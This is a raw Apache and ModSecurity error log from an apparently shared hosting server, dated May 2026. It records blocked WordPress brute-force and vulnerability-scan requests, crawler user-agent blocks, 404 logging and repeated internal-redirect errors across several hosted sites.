[Tue May 26 18:30:12.118521 2026] [core:error] [pid 998632:tid 998853] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:13.234563 2026] [security2:error] [pid 998632:tid 998886] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZWq1OTU2dW0MS1EnCyAAAAFk"]
[Tue May 26 18:30:13.283397 2026] [security2:error] [pid 998632:tid 998652] [remote 194.163.139.224:40168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZXa1OTU2dW0MS1EnDDwAABwE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:30:13.904703 2026] [security2:error] [pid 998632:tid 998682] [remote 119.18.52.246:40742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZXa1OTU2dW0MS1EnDIAAARRo"]
[Tue May 26 18:30:14.532874 2026] [security2:error] [pid 998632:tid 998691] [remote 132.148.72.88:55226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWZXq1OTU2dW0MS1EnDKgAAbSM"]
[Tue May 26 18:30:15.681951 2026] [security2:error] [pid 998632:tid 998679] [remote 132.148.72.88:55226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWZX61OTU2dW0MS1EnDRAAAbBg"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 18:30:16.001874 2026] [security2:error] [pid 998632:tid 998817] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZXa1OTU2dW0MS1EnDGQAAABo"]
[Tue May 26 18:30:16.703391 2026] [security2:error] [pid 998632:tid 998821] [client 167.114.139.126:58000] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.toronto121mortgage.com"] [uri "/robots.txt"] [unique_id "ahWZYK1OTU2dW0MS1EnDUgAAAB0"]
[Tue May 26 18:30:16.703509 2026] [security2:error] [pid 998632:tid 998821] [client 167.114.139.126:58000] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.toronto121mortgage.com"] [uri "/robots.txt"] [unique_id "ahWZYK1OTU2dW0MS1EnDUgAAAB0"]
[Tue May 26 18:30:17.388913 2026] [security2:error] [pid 998632:tid 998715] [remote 119.18.52.246:40742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZYa1OTU2dW0MS1EnDVwAAKzs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:30:18.084841 2026] [security2:error] [pid 998632:tid 998823] [client 51.161.65.224:57708] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.toronto121mortgage.com"] [uri "/"] [unique_id "ahWZYq1OTU2dW0MS1EnDZwAAAB8"]
[Tue May 26 18:30:18.084965 2026] [security2:error] [pid 998632:tid 998823] [client 51.161.65.224:57708] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.toronto121mortgage.com"] [uri "/"] [unique_id "ahWZYq1OTU2dW0MS1EnDZwAAAB8"]
[Tue May 26 18:30:18.412574 2026] [core:error] [pid 998632:tid 998842] [client 5.255.120.167:33426] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:18.412593 2026] [core:error] [pid 998632:tid 998842] [client 5.255.120.167:33426] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:19.656692 2026] [security2:error] [pid 998632:tid 998894] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZYK1OTU2dW0MS1EnDSwAAAGE"]
[Tue May 26 18:30:19.967928 2026] [core:error] [pid 998632:tid 998875] [client 5.255.120.167:33436] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:19.967952 2026] [core:error] [pid 998632:tid 998875] [client 5.255.120.167:33436] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:20.151225 2026] [security2:error] [pid 998632:tid 998741] [remote 216.73.216.30:44880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWZZK1OTU2dW0MS1EnDoAAAblU"]
[Tue May 26 18:30:21.525235 2026] [security2:error] [pid 998632:tid 998723] [remote 216.73.216.30:44880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWZZa1OTU2dW0MS1EnDvgAAbkM"]
[Tue May 26 18:30:21.601535 2026] [security2:error] [pid 998632:tid 998803] [client 124.43.5.103:8493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZZa1OTU2dW0MS1EnDvwAAAAw"]
[Tue May 26 18:30:21.601808 2026] [security2:error] [pid 998632:tid 998803] [client 124.43.5.103:8493] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZZa1OTU2dW0MS1EnDvwAAAAw"]
[Tue May 26 18:30:21.815296 2026] [security2:error] [pid 998632:tid 998911] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZYq1OTU2dW0MS1EnDfgAAAHI"]
[Tue May 26 18:30:21.942092 2026] [security2:error] [pid 998632:tid 998794] [client 143.198.114.199:61655] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "sandbox.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/wp-includes/wlwmanifest.xml"] [unique_id "ahWZZa1OTU2dW0MS1EnDyQAAAAM"]
[Tue May 26 18:30:23.011008 2026] [security2:error] [pid 998632:tid 998814] [client 49.13.167.123:21748] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWZZq1OTU2dW0MS1EnD1QAAABc"], referer: http://ucdc.co.in/
[Tue May 26 18:30:23.214169 2026] [security2:error] [pid 998632:tid 998738] [remote 119.18.52.246:53442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZZ61OTU2dW0MS1EnD2QAAEVI"]
[Tue May 26 18:30:23.567218 2026] [security2:error] [pid 998632:tid 998672] [remote 165.22.95.96:59582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWZZ61OTU2dW0MS1EnD3gAAJhM"]
[Tue May 26 18:30:23.802999 2026] [security2:error] [pid 998632:tid 998710] [remote 216.73.216.30:44880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWZZ61OTU2dW0MS1EnD5gAAbjY"]
[Tue May 26 18:30:24.353283 2026] [security2:error] [pid 998632:tid 998838] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZZa1OTU2dW0MS1EnDtwAAACw"]
[Tue May 26 18:30:26.375101 2026] [core:error] [pid 998632:tid 998883] [client 5.255.120.167:33458] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:26.375125 2026] [core:error] [pid 998632:tid 998883] [client 5.255.120.167:33458] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:26.567132 2026] [security2:error] [pid 998632:tid 998734] [remote 123.30.233.13:56474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWZaq1OTU2dW0MS1EnEGwAAPk4"]
[Tue May 26 18:30:26.876079 2026] [security2:error] [pid 998632:tid 998704] [remote 119.18.52.246:53442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZaq1OTU2dW0MS1EnEJAAAMTA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:30:27.461731 2026] [security2:error] [pid 998632:tid 998901] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZaa1OTU2dW0MS1EnD-QAAAGg"]
[Tue May 26 18:30:27.917314 2026] [core:error] [pid 998632:tid 998880] [client 5.255.120.167:50134] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:27.917338 2026] [core:error] [pid 998632:tid 998880] [client 5.255.120.167:50134] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:29.462552 2026] [security2:error] [pid 998632:tid 998669] [remote 216.73.216.30:56148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWZba1OTU2dW0MS1EnEXwAAXBA"]
[Tue May 26 18:30:30.413371 2026] [security2:error] [pid 998632:tid 998784] [remote 146.174.179.205:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWZbK1OTU2dW0MS1EnEPAAAbH0"]
[Tue May 26 18:30:30.435500 2026] [core:error] [pid 998632:tid 998908] [client 5.255.120.167:50140] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:30.435518 2026] [core:error] [pid 998632:tid 998908] [client 5.255.120.167:50140] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:30.515203 2026] [security2:error] [pid 998632:tid 998859] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZa61OTU2dW0MS1EnEMwAAAEE"]
[Tue May 26 18:30:32.206200 2026] [security2:error] [pid 998632:tid 998806] [client 146.174.162.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZba1OTU2dW0MS1EnEVAAAAA8"]
[Tue May 26 18:30:32.284074 2026] [security2:error] [pid 998632:tid 998842] [client 124.43.5.103:64772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZcK1OTU2dW0MS1EnEkgAAADA"]
[Tue May 26 18:30:32.284172 2026] [security2:error] [pid 998632:tid 998842] [client 124.43.5.103:64772] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZcK1OTU2dW0MS1EnEkgAAADA"]
[Tue May 26 18:30:32.410816 2026] [security2:error] [pid 998632:tid 998758] [remote 213.171.208.232:37456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZcK1OTU2dW0MS1EnEkQAACmU"]
[Tue May 26 18:30:32.455536 2026] [security2:error] [pid 998632:tid 998887] [client 114.119.146.198:35173] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "politica-global.com"] [uri "/"] [unique_id "ahWZcK1OTU2dW0MS1EnElQAAAFo"], referer: https://8coint.com/list.php?part=2025/09/26/93
[Tue May 26 18:30:32.763929 2026] [security2:error] [pid 998632:tid 998744] [remote 160.242.199.210:50800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.199.242.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZcK1OTU2dW0MS1EnEmQAAPlg"]
[Tue May 26 18:30:33.113174 2026] [security2:error] [pid 998632:tid 998918] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZbq1OTU2dW0MS1EnEaQAAAHk"]
[Tue May 26 18:30:33.327467 2026] [security2:error] [pid 998632:tid 998671] [remote 193.42.61.12:46206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZca1OTU2dW0MS1EnEqwAANRI"]
[Tue May 26 18:30:33.456400 2026] [security2:error] [pid 998632:tid 998769] [remote 160.242.199.210:50800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.199.242.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZca1OTU2dW0MS1EnErgAAZG4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:30:33.955929 2026] [security2:error] [pid 998632:tid 998662] [remote 213.171.208.232:37456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZca1OTU2dW0MS1EnEtgAAHwo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:30:35.305479 2026] [security2:error] [pid 998632:tid 998903] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZcK1OTU2dW0MS1EnEmAAAAGo"]
[Tue May 26 18:30:38.126693 2026] [security2:error] [pid 998632:tid 998817] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZc61OTU2dW0MS1EnE2gAAABo"]
[Tue May 26 18:30:41.162935 2026] [security2:error] [pid 998632:tid 998778] [remote 162.240.52.198:51842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZea1OTU2dW0MS1EnFRAAARXc"]
[Tue May 26 18:30:41.248853 2026] [security2:error] [pid 998632:tid 998810] [client 103.70.43.45:1031] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahWZdq1OTU2dW0MS1EnFEwAAABM"]
[Tue May 26 18:30:41.267160 2026] [security2:error] [pid 998632:tid 998808] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZdq1OTU2dW0MS1EnFEQAAABE"]
[Tue May 26 18:30:41.613565 2026] [security2:error] [pid 998632:tid 998680] [remote 74.207.252.187:33860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.252.207.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZea1OTU2dW0MS1EnFTgAASxk"]
[Tue May 26 18:30:41.965878 2026] [security2:error] [pid 998632:tid 998917] [client 3.77.67.4:49528] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWZea1OTU2dW0MS1EnFUAAAAHg"], referer: https://thegoodsporting.com
[Tue May 26 18:30:43.197467 2026] [security2:error] [pid 998632:tid 998813] [client 124.43.5.103:9423] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZeq1OTU2dW0MS1EnFbgAAABY"]
[Tue May 26 18:30:43.197663 2026] [security2:error] [pid 998632:tid 998813] [client 124.43.5.103:9423] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZeq1OTU2dW0MS1EnFbgAAABY"]
[Tue May 26 18:30:43.405946 2026] [security2:error] [pid 998632:tid 998836] [client 66.249.64.1:41734] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWZe61OTU2dW0MS1EnFcgAAACo"], referer: https://www.yourstorybag.com/free-resources/
[Tue May 26 18:30:43.648409 2026] [security2:error] [pid 998632:tid 998693] [remote 78.142.18.172:39442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZe61OTU2dW0MS1EnFdwAAJSU"]
[Tue May 26 18:30:43.720898 2026] [security2:error] [pid 998632:tid 998896] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZea1OTU2dW0MS1EnFSgAAAGM"]
[Tue May 26 18:30:44.403569 2026] [security2:error] [pid 998632:tid 998689] [remote 78.142.18.172:39442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZfK1OTU2dW0MS1EnFjAAAZyE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:30:46.323364 2026] [security2:error] [pid 998632:tid 998794] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZe61OTU2dW0MS1EnFhQAAAAM"]
[Tue May 26 18:30:46.602268 2026] [security2:error] [pid 998632:tid 998800] [client 106.222.227.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWZfq1OTU2dW0MS1EnFyQAAAAk"]
[Tue May 26 18:30:46.602772 2026] [security2:error] [pid 998632:tid 998920] [client 106.222.227.47:1743] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWZfq1OTU2dW0MS1EnFtwAAAHs"]
